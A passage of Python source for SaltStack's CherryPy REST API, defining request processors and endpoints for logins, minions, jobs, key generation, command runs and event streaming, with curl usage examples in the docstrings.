    raw = entity.fp.read()
    active_request = cherrypy.serving.request

    try:
        active_request.unserialized_data = json.loads(raw)
    except ValueError:
        # Not JSON after all; pass the raw text through unchanged.
        active_request.unserialized_data = raw

    active_request.raw_body = raw
def hypermedia_in():
    '''
    Unserialize POST/PUT data of a specified Content-Type.

    The following custom processors all are intended to format Low State data
    and will place that data structure into the request object.

    :raises HTTPError: if the request contains a Content-Type that we do not
        have a processor for
    '''
    active_request = cherrypy.request

    # Be liberal in what you accept
    content_handlers = {
        'application/x-www-form-urlencoded': urlencoded_processor,
        'application/json': json_processor,
        'application/x-yaml': yaml_processor,
        'text/yaml': yaml_processor,
        'text/plain': text_processor,
    }

    # Do not process the body for POST requests that have specified no content
    # or have not specified Content-Length
    is_post = active_request.method.upper() == 'POST'
    declared_length = active_request.headers.get('Content-Length', '0')
    if is_post and declared_length == '0':
        active_request.process_request_body = False
        active_request.unserialized_data = None

    active_request.body.processors.clear()
    active_request.body.default_proc = cherrypy.HTTPError(
        406, 'Content type not supported')
    active_request.body.processors = content_handlers
def lowdata_fmt():
    '''
    Validate and format lowdata from incoming unserialized request data

    This tool requires that the hypermedia_in tool has already been run.
    '''
    if cherrypy.request.method.upper() != 'POST':
        return

    data = cherrypy.request.unserialized_data

    # Robustness fix: hypermedia_in marks zero-length POST bodies with
    # unserialized_data = None; running the membership test below on None
    # raised TypeError (surfacing as a 500). Treat it as an empty lowstate.
    if data is None:
        cherrypy.request.lowstate = []
        return

    # if the data was sent as urlencoded, we need to make it a list.
    # this is a very forgiving implementation as different clients set different
    # headers for form encoded data (including charset or something similar)
    if not isinstance(data, list):
        # Make the 'arg' param a list if not already
        if 'arg' in data and not isinstance(data['arg'], list):
            data['arg'] = [data['arg']]

        # Finally, make a Low State and put it in request
        cherrypy.request.lowstate = [data]
    else:
        cherrypy.serving.request.lowstate = data
# Register the helpers above as CherryPy tools at their respective hook
# points. NOTE(review): within the same hook point, CherryPy runs tools in
# priority order (lower number first) — confirm against the CherryPy docs
# if reordering.
cherrypy.tools.html_override = cherrypy.Tool('on_start_resource',
                                             html_override_tool, priority=53)
cherrypy.tools.salt_token = cherrypy.Tool('on_start_resource',
                                          salt_token_tool, priority=55)
cherrypy.tools.salt_auth = cherrypy.Tool('before_request_body',
                                         salt_auth_tool, priority=60)
cherrypy.tools.hypermedia_in = cherrypy.Tool('before_request_body',
                                             hypermedia_in)
cherrypy.tools.cors_tool = cherrypy.Tool('before_handler',
                                         cors_tool, priority=30)
cherrypy.tools.lowdata_fmt = cherrypy.Tool('before_handler',
                                           lowdata_fmt, priority=40)
cherrypy.tools.hypermedia_out = cherrypy.Tool('before_handler',
                                              hypermedia_out)
cherrypy.tools.salt_ip_verify = cherrypy.Tool('before_handler',
                                              salt_ip_verify_tool)
###############################################################################
class LowDataAdapter(object):
    '''
    The primary entry point to Salt's REST API
    '''
    exposed = True

    _cp_config = {
        'tools.sessions.on': True,
        'tools.sessions.timeout': 60 * 10,  # 10 hours

        # 'tools.autovary.on': True,

        'tools.hypermedia_out.on': True,
        'tools.hypermedia_in.on': True,
        'tools.lowdata_fmt.on': True,
        'tools.salt_ip_verify.on': True,
    }

    def __init__(self):
        # Master config options and the netapi client used to dispatch
        # lowstate chunks to the various Salt client interfaces.
        self.opts = cherrypy.config['saltopts']
        self.api = salt.netapi.NetapiClient(self.opts)

    def exec_lowstate(self, client=None, token=None):
        '''
        Pull a Low State data structure from request and execute the low-data
        chunks through Salt. The low-data chunks will be updated to include the
        authorization token for the current session.

        :param client: if given, forced onto every chunk's ``client`` key
        :param token: if given, added to every chunk as its ``token`` key
        :return: a generator yielding one result per lowstate chunk
        :raises HTTPError: 400 if the request's lowstate is not a list
        '''
        lowstate = cherrypy.request.lowstate

        # Release the session lock before executing any potentially
        # long-running Salt commands. This allows different threads to execute
        # Salt commands concurrently without blocking.
        if cherrypy.request.config.get('tools.sessions.on', False):
            cherrypy.session.release_lock()

        # if the lowstate loaded isn't a list, lets notify the client
        if not isinstance(lowstate, list):
            raise cherrypy.HTTPError(400, 'Lowstates must be a list')

        # Make any requested additions or modifications to each lowstate, then
        # execute each one and yield the result.
        for chunk in lowstate:
            if token:
                chunk['token'] = token

            if client:
                chunk['client'] = client

            # Make any 'arg' params a list if not already.
            # This is largely to fix a deficiency in the urlencoded format.
            if 'arg' in chunk and not isinstance(chunk['arg'], list):
                chunk['arg'] = [chunk['arg']]

            ret = self.api.run(chunk)

            # Sometimes Salt gives us a return and sometimes an iterator
            # (collections.Iterator is the Py2 location; collections.abc on Py3)
            if isinstance(ret, collections.Iterator):
                for i in ret:
                    yield i
            else:
                yield ret

    def GET(self):
        '''
        An explanation of the API with links of where to go next

        .. http:get:: /

            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000

        .. code-block:: http

            GET / HTTP/1.1
            Host: localhost:8000
            Accept: application/json

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Type: application/json
        '''
        import inspect

        # Grab all available client interfaces
        clients = [name for name, _ in inspect.getmembers(salt.netapi.NetapiClient,
            predicate=inspect.ismethod) if not name.startswith('__')]
        clients.remove('run')  # run method calls client interfaces

        return {
            'return': "Welcome",
            'clients': clients,
        }

    @cherrypy.tools.salt_token()
    @cherrypy.tools.salt_auth()
    def POST(self, **kwargs):
        '''
        Send one or more Salt commands in the request body

        .. http:post:: /

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

            :term:`lowstate` data describing Salt commands must be sent in the
            request body.

        **Example request:**

        .. code-block:: bash

            curl -sSik https://localhost:8000 \\
                -H "Accept: application/x-yaml" \\
                -H "X-Auth-Token: d40d1e1e<...snip...>" \\
                -d client=local \\
                -d tgt='*' \\
                -d fun='test.ping' \\

        .. code-block:: http

            POST / HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            X-Auth-Token: d40d1e1e
            Content-Length: 36
            Content-Type: application/x-www-form-urlencoded

            fun=test.ping&client=local&tgt=*

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 200
            Allow: GET, HEAD, POST
            Content-Type: application/x-yaml

            return:
            - ms-0: true
                ms-1: true
                ms-2: true
                ms-3: true
                ms-4: true

        **Other examples**:

        .. code-block:: bash

            # Sending multiple positional args with urlencoded:
            curl -sSik https://localhost:8000 \\
                -d client=local \\
                -d tgt='*' \\
                -d fun='cmd.run' \\
                -d arg='du -sh .' \\
                -d arg='/path/to/dir'

            # Sending positional args and Keyword args with JSON:
            echo '[
                {
                    "client": "local",
                    "tgt": "*",
                    "fun": "cmd.run",
                    "arg": [
                        "du -sh .",
                        "/path/to/dir"
                    ],
                    "kwarg": {
                        "shell": "/bin/sh",
                        "template": "jinja"
                    }
                }
            ]' | curl -sSik https://localhost:8000 \\
                -H 'Content-type: application/json' \\
                -d@-

            # Calling runner functions:
            curl -sSik https://localhost:8000 \\
                -d client=runner \\
                -d fun='jobs.lookup_jid' \\
                -d jid='20150129182456704682' \\
                -d outputter=highstate

            # Calling wheel functions:
            curl -sSik https://localhost:8000 \\
                -d client=wheel \\
                -d fun='key.gen_accept' \\
                -d id_=dave \\
                -d keysize=4096
        '''
        return {
            'return': list(self.exec_lowstate(
                token=cherrypy.session.get('token')))
        }
class Minions(LowDataAdapter):
    '''
    Convenience URLs for working with minions
    '''
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def GET(self, mid=None):
        '''
        A convenience URL for getting lists of minions or getting minion
        details

        .. http:get:: /minions/(mid)

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/minions/ms-3

        .. code-block:: http

            GET /minions/ms-3 HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 129005
            Content-Type: application/x-yaml

            return:
            - ms-3:
                grains.items:
                    ...
        '''
        # No minion id means "all minions" via the glob target '*'.
        cherrypy.request.lowstate = [{
            'client': 'local', 'tgt': mid or '*', 'fun': 'grains.items',
        }]
        return {
            'return': list(self.exec_lowstate(
                token=cherrypy.session.get('token'))),
        }

    def POST(self, **kwargs):
        '''
        Start an execution command and immediately return the job id

        .. http:post:: /minions

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :resheader Content-Type: |res_ct|

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

            :term:`lowstate` data describing Salt commands must be sent in the
            request body. The ``client`` option will be set to
            :py:meth:`~salt.client.LocalClient.local_async`.

        **Example request:**

        .. code-block:: bash

            curl -sSi localhost:8000/minions \\
                -H "Accept: application/x-yaml" \\
                -d tgt='*' \\
                -d fun='status.diskusage'

        .. code-block:: http

            POST /minions HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Length: 26
            Content-Type: application/x-www-form-urlencoded

            tgt=*&fun=status.diskusage

        **Example response:**

        .. code-block:: http

            HTTP/1.1 202 Accepted
            Content-Length: 86
            Content-Type: application/x-yaml

            return:
            - jid: '20130603122505459265'
              minions: [ms-4, ms-3, ms-2, ms-1, ms-0]
            _links:
              jobs:
              - href: /jobs/20130603122505459265
        '''
        # Force the asynchronous local client so this request returns the
        # job id immediately instead of blocking on minion returns.
        job_data = list(self.exec_lowstate(client='local_async',
            token=cherrypy.session.get('token')))

        cherrypy.response.status = 202
        return {
            'return': job_data,
            '_links': {
                # NOTE(review): assumes every truthy result dict carries a
                # 'jid' key — confirm against the local_async return shape.
                'jobs': [{'href': '/jobs/{0}'.format(i['jid'])}
                    for i in job_data if i],
            },
        }
class Jobs(LowDataAdapter):
    '''
    Convenience URLs for working with the job cache
    '''
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
    })

    def GET(self, jid=None, timeout=''):
        '''
        A convenience URL for getting lists of previously run jobs or getting
        the return from a single job

        .. http:get:: /jobs/(jid)

            List jobs or show a single job from the job cache.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/jobs

        .. code-block:: http

            GET /jobs HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 165
            Content-Type: application/x-yaml

            return:
            - '20121130104633606931':
                Arguments:
                - '3'
                Function: test.fib
                Start Time: 2012, Nov 30 10:46:33.606931
                Target: jerry
                Target-type: glob

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/jobs/20121130104633606931

        .. code-block:: http

            GET /jobs/20121130104633606931 HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            info:
            - Arguments:
                - '3'
                Function: test.fib
                Minions:
                - jerry
                Start Time: 2012, Nov 30 10:46:33.606931
                Target: '*'
                Target-type: glob
                User: saltdev
                jid: '20121130104633606931'
            return:
            - jerry:
                - - 0
                - 1
                - 1
                - 2
                - 6.9141387939453125e-06
        '''
        # Non-numeric (or empty) timeout strings mean "no timeout".
        timeout = int(timeout) if timeout.isdigit() else None
        if jid:
            # With a jid, fetch both the job's return and its metadata.
            lowstate = [{
                'client': 'runner',
                'fun': 'jobs.lookup_jid',
                'args': (jid,),
                'timeout': timeout,
            }, {
                'client': 'runner',
                'fun': 'jobs.list_job',
                'args': (jid,),
                'timeout': timeout,
            }]
        else:
            lowstate = [{
                'client': 'runner',
                'fun': 'jobs.list_jobs',
                'timeout': timeout,
            }]

        cherrypy.request.lowstate = lowstate
        job_ret_info = list(self.exec_lowstate(
            token=cherrypy.session.get('token')))

        ret = {}
        if jid:
            # Results arrive in the same order as the lowstate chunks above.
            job_ret, job_info = job_ret_info
            ret['info'] = [job_info]
        else:
            job_ret = job_ret_info[0]

        ret['return'] = [job_ret]
        return ret
class Keys(LowDataAdapter):
    '''
    Convenience URLs for working with minion keys

    .. versionadded:: 2014.7.0

    These URLs wrap the functionality provided by the :py:mod:`key wheel
    module <salt.wheel.key>` functions.
    '''
    def GET(self, mid=None):
        '''
        Show the list of minion keys or detail on a specific key

        .. versionadded:: 2014.7.0

        .. http:get:: /keys/(mid)

            List all keys or show a specific key

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/keys

        .. code-block:: http

            GET /keys HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 165
            Content-Type: application/x-yaml

            return:
              local:
              - master.pem
              - master.pub
              minions:
              - jerry
              minions_pre: []
              minions_rejected: []

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/keys/jerry

        .. code-block:: http

            GET /keys/jerry HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            return:
              minions:
                jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
        '''
        # NOTE(review): Keys defines no _cp_config of its own, so this
        # mutates the dict inherited from LowDataAdapter — a class-level,
        # process-wide side effect shared by all adapters. Confirm intent.
        self._cp_config['tools.salt_token.on'] = True

        if mid:
            lowstate = [{
                'client': 'wheel',
                'fun': 'key.finger',
                'match': mid,
            }]
        else:
            lowstate = [{
                'client': 'wheel',
                'fun': 'key.list_all',
            }]

        cherrypy.request.lowstate = lowstate
        result = self.exec_lowstate(token=cherrypy.session.get('token'))

        return {'return': next(result, {}).get('data', {}).get('return', {})}

    def POST(self, mid, keysize=None, force=None, **kwargs):
        r'''
        Easily generate keys for a minion and auto-accept the new key

        .. versionadded:: 2014.7.0

        Example partial kickstart script to bootstrap a new minion:

        .. code-block:: text

            %post
            mkdir -p /etc/salt/pki/minion
            curl -sSk https://localhost:8000/keys \
                    -d mid=jerry \
                    -d username=kickstart \
                    -d password=kickstart \
                    -d eauth=pam \
                | tar -C /etc/salt/pki/minion -xf -

            mkdir -p /etc/salt/minion.d
            printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
            %end

        .. http:post:: /keys

            Generate a public and private key and return both as a tarball

            Authentication credentials must be passed in the request.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -sSk https://localhost:8000/keys \
                    -d mid=jerry \
                    -d username=kickstart \
                    -d password=kickstart \
                    -d eauth=pam \
                    -o jerry-salt-keys.tar

        .. code-block:: http

            POST /keys HTTP/1.1
            Host: localhost:8000

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 10240
            Content-Disposition: attachment; filename="saltkeys-jerry.tar"
            Content-Type: application/x-tar

            jerry.pub0000644000000000000000000000070300000000000010730 0ustar  00000000000000
        '''
        # NOTE(review): as in GET above, these mutate the class-shared
        # _cp_config inherited from LowDataAdapter. The raw tarball response
        # must bypass serialization and session handling.
        self._cp_config['tools.hypermedia_out.on'] = False
        self._cp_config['tools.sessions.on'] = False

        lowstate = [{
            'client': 'wheel',
            'fun': 'key.gen_accept',
            'id_': mid,
        }]

        if keysize:
            lowstate[0]['keysize'] = keysize

        if force:
            lowstate[0]['force'] = force

        lowstate[0].update(kwargs)

        cherrypy.request.lowstate = lowstate
        result = self.exec_lowstate()
        ret = next(result, {}).get('data', {}).get('return', {})

        # Package the generated keypair as an in-memory tar archive.
        pub_key = ret.get('pub', '')
        pub_key_file = tarfile.TarInfo('minion.pub')
        pub_key_file.size = len(pub_key)
        priv_key = ret.get('priv', '')
        priv_key_file = tarfile.TarInfo('minion.pem')
        priv_key_file.size = len(priv_key)

        fileobj = StringIO.StringIO()
        tarball = tarfile.open(fileobj=fileobj, mode='w')
        tarball.addfile(pub_key_file, StringIO.StringIO(pub_key))
        tarball.addfile(priv_key_file, StringIO.StringIO(priv_key))
        tarball.close()

        headers = cherrypy.response.headers
        headers['Content-Disposition'] = 'attachment; filename="saltkeys-{0}.tar"'.format(mid)
        headers['Content-Type'] = 'application/x-tar'
        headers['Content-Length'] = fileobj.len
        headers['Cache-Control'] = 'no-cache'

        fileobj.seek(0)
        return fileobj
class Login(LowDataAdapter):
    '''
    Log in to receive a session token

    :ref:`Authentication information <rest_cherrypy-auth>`.
    '''
    def __init__(self, *args, **kwargs):
        super(Login, self).__init__(*args, **kwargs)

        # Resolver performs the actual eauth credential checks.
        self.auth = salt.auth.Resolver(self.opts)

    def GET(self):
        '''
        Present the login interface

        .. http:get:: /login

            An explanation of how to log in.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -i localhost:8000/login

        .. code-block:: http

            GET /login HTTP/1.1
            Host: localhost:8000
            Accept: text/html

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Type: text/html
        '''
        cherrypy.response.headers['WWW-Authenticate'] = 'Session'

        return {
            'status': cherrypy.response.status,
            'return': "Please log in",
        }

    def POST(self, **kwargs):
        '''
        :ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system

        .. http:post:: /login

            :reqheader X-Auth-Token: |req_token|
            :reqheader Accept: |req_accept|
            :reqheader Content-Type: |req_ct|

            :form eauth: the eauth backend configured for the user
            :form username: username
            :form password: password

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -si localhost:8000/login \\
                -H "Accept: application/json" \\
                -d username='saltuser' \\
                -d password='saltpass' \\
                -d eauth='pam'

        .. code-block:: http

            POST / HTTP/1.1
            Host: localhost:8000
            Content-Length: 42
            Content-Type: application/x-www-form-urlencoded
            Accept: application/json

            username=saltuser&password=saltpass&eauth=pam

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Type: application/json
            Content-Length: 206
            X-Auth-Token: 6d1b722e
            Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/

            {"return": {
                "token": "6d1b722e",
                "start": 1363805943.776223,
                "expire": 1363849143.776224,
                "user": "saltuser",
                "eauth": "pam",
                "perms": [
                    "grains.*",
                    "status.*",
                    "sys.*",
                    "test.*"
                ]
            }}
        '''
        if not self.api._is_master_running():
            raise salt.exceptions.SaltDaemonNotRunning(
                'Salt Master is not available.')

        # the urlencoded_processor will wrap this in a list
        if isinstance(cherrypy.serving.request.lowstate, list):
            creds = cherrypy.serving.request.lowstate[0]
        else:
            creds = cherrypy.serving.request.lowstate

        token = self.auth.mk_token(creds)
        if 'token' not in token:
            raise cherrypy.HTTPError(401,
                'Could not authenticate using provided credentials')

        # Bind the Salt token to this HTTP session; the caller only ever
        # sees the session id, never the raw Salt token.
        cherrypy.response.headers['X-Auth-Token'] = cherrypy.session.id
        cherrypy.session['token'] = token['token']
        # Session timeout is expressed in minutes.
        cherrypy.session['timeout'] = (token['expire'] - token['start']) / 60

        # Grab eauth config for the current backend for the current user
        try:
            eauth = self.opts.get('external_auth', {}).get(token['eauth'], {})

            # Get sum of the user's permissions from the group entries
            # (keys ending in '%') that match the user's group membership.
            if 'groups' in token:
                user_groups = set(token['groups'])
                eauth_groups = set([i.rstrip('%') for i in eauth.keys() if i.endswith('%')])

                perms = []
                for group in user_groups & eauth_groups:
                    perms.extend(eauth['{0}%'.format(group)])

                perms = perms or None
            else:
                perms = eauth.get(token['name'], eauth.get('*'))

            if perms is None:
                raise ValueError("Eauth permission list not found.")
        except (AttributeError, IndexError, KeyError, ValueError):
            logger.debug("Configuration for external_auth malformed for "
                         "eauth '{0}', and user '{1}'."
                         .format(token.get('eauth'), token.get('name')), exc_info=True)
            raise cherrypy.HTTPError(500,
                'Configuration for external_auth could not be read.')

        return {'return': [{
            'token': cherrypy.session.id,
            'expire': token['expire'],
            'start': token['start'],
            'user': token['name'],
            'eauth': token['eauth'],
            'perms': perms,
        }]}
class Logout(LowDataAdapter):
    '''
    Invalidate the current session and clear its token
    '''
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.salt_token.on': True,
        'tools.salt_auth.on': True,
        'tools.lowdata_fmt.on': False,
    })

    def POST(self):
        '''
        Destroy the currently active session and expire the session cookie
        '''
        # Expire the cookie on the client, then replace the server-side
        # session with a brand new (unauthenticated) one.
        cherrypy.lib.sessions.expire()
        cherrypy.session.regenerate()

        return {'return': "Your token has been cleared"}
class Run(LowDataAdapter):
    '''
    Class to run commands without normal session handling
    '''
    _cp_config = dict(LowDataAdapter._cp_config, **{
        'tools.sessions.on': False,
    })

    def POST(self, **kwargs):
        '''
        Run commands bypassing the :ref:`normal session handling
        <rest_cherrypy-auth>`

        .. http:post:: /run

            This entry point is primarily for "one-off" commands. Each request
            must pass full Salt authentication credentials. Otherwise this URL
            is identical to the :py:meth:`root URL (/) <LowDataAdapter.POST>`.

            :term:`lowstate` data describing Salt commands must be sent in the
            request body.

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

        **Example request:**

        .. code-block:: bash

            curl -sS localhost:8000/run \\
                -H 'Accept: application/x-yaml' \\
                -d client='local' \\
                -d tgt='*' \\
                -d fun='test.ping' \\
                -d username='saltdev' \\
                -d password='saltdev' \\
                -d eauth='pam'

        .. code-block:: http

            POST /run HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Length: 75
            Content-Type: application/x-www-form-urlencoded

            client=local&tgt=*&fun=test.ping&username=saltdev&password=saltdev&eauth=pam

        **Example response:**

        .. code-block:: http

            HTTP/1.1 200 OK
            Content-Length: 73
            Content-Type: application/x-yaml

            return:
            - ms-0: true
                ms-1: true
                ms-2: true
                ms-3: true
                ms-4: true

        The /run endpoint can also be used to issue commands using the salt-ssh subsystem.

        When using salt-ssh, eauth credentials should not be supplied. Instead, authentication
        should be handled by the SSH layer itself. The use of the salt-ssh client does not
        require a salt master to be running. Instead, only a roster file must be present
        in the salt configuration directory.

        All SSH client requests are synchronous.

        **Example SSH client request:**

        .. code-block:: bash

            curl -sS localhost:8000/run \\
                -H 'Accept: application/x-yaml' \\
                -d client='ssh' \\
                -d tgt='*' \\
                -d fun='test.ping'

        .. code-block:: http

            POST /run HTTP/1.1
            Host: localhost:8000
            Accept: application/x-yaml
            Content-Length: 75
            Content-Type: application/x-www-form-urlencoded

            client=ssh&tgt=*&fun=test.ping

        **Example SSH response:**

        .. code-block:: http

            return:
            - silver:
                fun: test.ping
                fun_args: []
                id: silver
                jid: '20141203103525666185'
                retcode: 0
                return: true
                success: true
        '''
        # Credentials travel inside each lowstate chunk, so no client or
        # token argument is supplied here.
        return {
            'return': list(self.exec_lowstate()),
        }
class Events(object):
    '''
    Expose the Salt event bus

    The event bus on the Salt master exposes a large variety of things, notably
    when executions are started on the master and also when minions ultimately
    return their results. This URL provides a real-time window into a running
    Salt infrastructure.

    .. seealso:: :ref:`events`
    '''
    exposed = True

    _cp_config = dict(LowDataAdapter._cp_config, **{
        'response.stream': True,
        'tools.encode.encoding': 'utf-8',

        # Auth handled manually below
        'tools.salt_token.on': True,
        'tools.salt_auth.on': False,

        'tools.hypermedia_in.on': False,
        'tools.hypermedia_out.on': False,
    })

    def __init__(self):
        self.opts = cherrypy.config['saltopts']
        self.resolver = salt.auth.Resolver(self.opts)

    def _is_valid_token(self, auth_token):
        '''
        Check if this is a valid salt-api token or valid Salt token

        salt-api tokens are regular session tokens that tie back to a real Salt
        token. Salt tokens are tokens generated by Salt's eauth system.

        :return bool: True if valid, False if not valid.
        '''
        if auth_token is None:
            return False

        # First check if the given token is in our session table; if so it's a
        # salt-api token and we need to get the Salt token from there.
        orig_sesion, _ = cherrypy.session.cache.get(auth_token, ({}, None))
        # If it's not in the session table, assume it's a regular Salt token.
        salt_token = orig_sesion.get('token', auth_token)

        # The eauth system does not currently support perms for the event
        # stream, so we're just checking if the token exists not if the token
        # allows access.
        if salt_token and self.resolver.get_token(salt_token):
            return True

        return False

    def GET(self, token=None, salt_token=None):
        r'''
        An HTTP stream of the Salt master event bus

        This stream is formatted per the Server Sent Events (SSE) spec. Each
        event is formatted as JSON.

        .. http:get:: /events

            :status 200: |200|
            :status 401: |401|
            :status 406: |406|

            :query token: **optional** parameter containing the token
                ordinarily supplied via the X-Auth-Token header in order to
                allow cross-domain requests in browsers that do not include
                CORS support in the EventSource API. E.g.,
                ``curl -NsS localhost:8000/events?token=308650d``
            :query salt_token: **optional** parameter containing a raw Salt
                *eauth token* (not to be confused with the token returned from
                the /login URL). E.g.,
                ``curl -NsS localhost:8000/events?salt_token=30742765``

        **Example request:**

        .. code-block:: bash

            curl -NsS localhost:8000/events

        Note, the ``tag`` field in each record is not part of the SSE spec;
        SSE-compliant clients ignore unknown fields, while non-compliant
        clients can use it to filter events without having to deserialize the
        JSON payload each time. Records are separated by blank lines, and
        curl's ``-N`` flag turns off input buffering, which is required to
        process the stream incrementally.
        '''
        # Token may arrive as a query param (for CORS-less EventSource), as a
        # raw Salt eauth token, or as the regular session cookie.
        cookies = cherrypy.request.cookie
        auth_token = token or salt_token or (
            cookies['session_id'].value if 'session_id' in cookies else None)

        if not self._is_valid_token(auth_token):
            raise cherrypy.HTTPError(401)

        # Release the session lock before starting the long-running response
        cherrypy.session.release_lock()

        cherrypy.response.headers['Content-Type'] = 'text/event-stream'
        cherrypy.response.headers['Cache-Control'] = 'no-cache'
        cherrypy.response.headers['Connection'] = 'keep-alive'

        def listen():
            '''
            An iterator to yield Salt events
            '''
            event = salt.utils.event.get_event(
                    'master',
                    sock_dir=self.opts['sock_dir'],
                    transport=self.opts['transport'],
                    opts=self.opts)
            stream = event.iter_events(full=True)

            # Suggested client reconnect interval per the SSE spec (ms).
            yield u'retry: {0}\n'.format(400)

            while True:
                data = next(stream)
                yield u'tag: {0}\n'.format(data.get('tag', ''))
                yield u'data: {0}\n\n'.format(json.dumps(data))

        return listen()
class WebsocketEndpoint(object):
    '''
    Open a WebSocket connection to Salt's event bus

    The event bus on the Salt master exposes a large variety of things, notably
    when executions are started on the master and also when minions ultimately
    return their results. This URL provides a real-time window into a running
    Salt infrastructure. Uses websocket as the transport mechanism.

    .. seealso:: :ref:`events`
    '''
    exposed = True

    _cp_config = dict(LowDataAdapter._cp_config, **{
        'response.stream': True,
        'tools.encode.encoding': 'utf-8',

        # Auth handled manually below
        'tools.salt_token.on': True,
        'tools.salt_auth.on': False,

        'tools.hypermedia_in.on': False,
        'tools.hypermedia_out.on': False,
        'tools.websocket.on': True,
        'tools.websocket.handler_cls': websockets.SynchronizingWebsocket,
    })

    def __init__(self):
        self.opts = cherrypy.config['saltopts']
        self.auth = salt.auth.LoadAuth(self.opts)

    def GET(self, token=None, **kwargs):
        '''
        Return a websocket connection of Salt's event stream

        .. http:get:: /ws/(token)

            :query format_events: The event stream will undergo server-side
                formatting if the ``format_events`` URL parameter is included
                in the request. This can be useful to avoid formatting on the
                client-side:

                .. code-block:: bash

                    curl -NsS <...snip...> localhost:8000/ws?format_events

            :reqheader X-Auth-Token: an authentication token from
                :py:class:`~Login`.

            :status 101: switching to the websockets protocol
            :status 401: |401|
            :status 406: |406|

        An authentication token **may optionally** be passed as part of the URL
        for browsers that cannot be configured to send the authentication
        header or cookie:

        .. code-block:: bash

            curl -NsS <...snip...> localhost:8000/ws/ffedf49d

        Clients activate real-time updates from Salt's event stream by
        signaling ``websocket client ready`` once the connection is
        established; events are then pushed over the socket as they occur.
        '''
        # Pulling the session token from an URL param is a workaround for
        # browsers not supporting CORS in the EventSource API.
        if token:
            orig_sesion, _ = cherrypy.session.cache.get(token, ({}, None))
            salt_token = orig_sesion.get('token')
        else:
            salt_token = cherrypy.session.get('token')

        # Manually verify the token
        if not salt_token or not self.auth.get_tok(salt_token):
            raise cherrypy.HTTPError(401)

        # Release the session lock before starting the long-running response
        cherrypy.session.release_lock()

        # A handler is the server side end of the websocket connection. Each
        # request spawns a new instance of this handler
        handler = cherrypy.request.ws_handler

        def event_stream(handler, pipe):
            '''
            An iterator to return Salt events (and optionally format them)
            '''
            # blocks until send is called on the parent end of this pipe.
            pipe.recv()
            event = salt.utils.event.get_event(
                    'master',
                    sock_dir=self.opts['sock_dir'],
                    transport=self.opts['transport'],
                    opts=self.opts)
            stream = event.iter_events(full=True)
            SaltInfo = event_processor.SaltInfo(handler)
            while True:
                data = next(stream)
                if data:
                    try:  # work around try to decode catch unicode errors
                        if 'format_events' in kwargs:
                            SaltInfo.process(data, salt_token, self.opts)
                        else:
                            handler.send('data: {0}\n\n'.format(
                                json.dumps(data)), False)
                    except UnicodeDecodeError:
                        logger.error(
                                "Error: Salt event has non UTF-8 data:\n{0}"
                                .format(data))
                # Throttle the loop so a quiet bus doesn't spin hot.
                time.sleep(0.1)

        parent_pipe, child_pipe = Pipe()
        handler.pipe = parent_pipe
        handler.opts = self.opts
        # Process to handle async push to a client.
        # Each GET request causes a process to be kicked off.
        proc = Process(target=event_stream, args=(handler, child_pipe))
        proc.start()
class Webhook(object):
    '''
    A generic web hook entry point that fires an event on Salt's event bus

    External services can POST data to this URL to trigger an event in Salt.
    For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.

    .. note:: Be mindful of security

        Salt's Reactor can run any code. A Reactor SLS that responds to a hook
        event is responsible for validating that the event came from a trusted
        source and contains valid data.

